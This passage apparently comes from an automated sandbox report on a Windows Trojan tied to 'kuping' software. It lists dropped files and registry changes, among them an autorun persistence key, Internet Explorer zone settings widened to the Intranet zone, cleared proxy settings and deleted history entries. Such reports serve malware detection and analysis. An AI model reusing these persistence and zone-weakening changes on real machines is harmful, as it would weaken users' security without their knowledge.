%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225\index.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_7E.tmp (0 bytes)
C:\op_7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\LZMA.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KP_7D\skinconfig\ĬÈÃÂÂ\ui\msgbox\btn_known.png (0 bytes)
Registry activity
The process kp4_Mini.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F D8 3C 8C 65 7A F7 15 B8 99 C8 26 BE F9 1B 2C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process kuping_v4.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\kpscrfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCR\kplguifile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCR\kpthemefile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Kuping]
"InstallPath" = "c:\kuping4\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\kpiconfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,4"
[HKCR\kpthemefile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,1"
[HKCR\kpscrfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\.kprar]
"(Default)" = "kprarfile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\kpscrfile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\kpcurfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCR\kprarfile]
"(Default)" = "¿áÆÃÂÂÖ÷ÌâÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpthemefile\Shell]
"(Default)" = "Open"
[HKCU\Software\Kuping]
"ExcutePath" = "c:\kuping4\kuping_v4.exe"
[HKCR\kpiconfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCR\.kpscr]
"(Default)" = "kpscrfile"
[HKCR\kprarfile\Shell]
"(Default)" = "Open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\kpcurfile]
"(Default)" = "¿áÆÃÂÂÊó±êÖ¸ÕëÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kprarfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\kpscrfile]
"(Default)" = "¿áÆÃÂÂÆñ£Ãâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpcurfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,3"
[HKCR\kplguifile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCR\kpcurfile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\.kpicon]
"(Default)" = "kpiconfile"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 4A 6E 00 4A 1B 1E BF 0D 09 40 AD 3A 5E E8 C2"
[HKCR\kprarfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Kuping]
"Command" = "install"
[HKCR\.kpcur]
"(Default)" = "kpcurfile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\kpiconfile\Shell]
"(Default)" = "Open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\kplguifile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCR\.kptheme]
"(Default)" = "kpthemefile"
[HKCR\.kplgui]
"(Default)" = "kplguifile"
[HKCR\kpiconfile]
"(Default)" = "¿áÆÃÂÂü±êÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpthemefile]
"(Default)" = "¿áÆÃÂÂÖ÷ÌâÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kplguifile]
"(Default)" = "¿áÆõǼ½çÃæÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dwwin.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 8C F2 33 43 FC 68 56 85 49 48 65 96 3D 58 FC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process getnew.exe:1672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 76 70 24 F2 98 09 64 B5 34 01 74 3C 80 48 D2"
The process %original file name%.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D3 F5 A7 C0 9F 62 53 78 BC 06 19 A7 84 78 61"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process kuping_b_53390.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\.kplgui]
"(Default)" = "kplguifile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\kpscrfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060920140610]
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"DisplayName" = "¿áÆÃÂÂ4"
[HKCR\kpcurfile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060920140610]
"CachePrefix" = ":2014060920140610:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\kpiconfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\kpscrfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\.kpscr]
"(Default)" = "kpscrfile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\.kptheme]
"(Default)" = "kpthemefile"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216" = "My Computer"
[HKCR\kpcurfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060920140610]
"CacheOptions" = "11"
[HKCR\.kprar]
"(Default)" = "kprarfile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060920140610]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014060920140610\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\kpscrfile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCR\kplguifile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"URLInfoAbout" = "http://www.wallba.com/"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"Publisher" = "»°Óï¿Æ¼¼"
[HKCR\.kpicon]
"(Default)" = "kpiconfile"
[HKCR\kprarfile]
"(Default)" = "Ö÷ÌâÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpthemefile\Shell]
"(Default)" = "Open"
[HKCR\kpiconfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCR\kpthemefile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,1"
[HKCR\kprarfile\Shell]
"(Default)" = "Open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\kpcurfile]
"(Default)" = "Êó±êÖ¸ÕëÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\kpscrfile]
"(Default)" = "Æñ£Ãâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpcurfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\kplguifile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCR\kpthemefile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"DisplayVersion" = "4.3.1.1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 7E 57 FC 86 9A D1 1A 6C 2F 19 C7 48 F1 7A 37"
[HKCR\kprarfile\DefaultIcon]
"(Default)" = "c:\kuping4\kuping_v4.exe,2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"UninstallString" = "c:\kuping4\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060920140610]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCR\.kpcur]
"(Default)" = "kpcurfile"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\kpiconfile\Shell]
"(Default)" = "Open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\kplguifile\Shell]
"(Default)" = "Open"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KP4]
"DisplayIcon" = "c:\kuping4\kuping_v4.exe"
[HKCR\kprarfile\Shell\Open\Command]
"(Default)" = "c:\kuping4\KpInstallTheme.exe %1"
[HKCR\kpiconfile]
"(Default)" = "ü±êÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kpthemefile]
"(Default)" = "Ö÷ÌâÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
[HKCR\kplguifile]
"(Default)" = "µÇ¼½çÃæÃâ€â€ÃƒÆ’ŠÃâ€Â´Îļþ"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kuping4" = "c:\kuping4\Kp_BootClr.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013030120130302]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021120130218]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021820130225]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"%original file name%.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-8964"
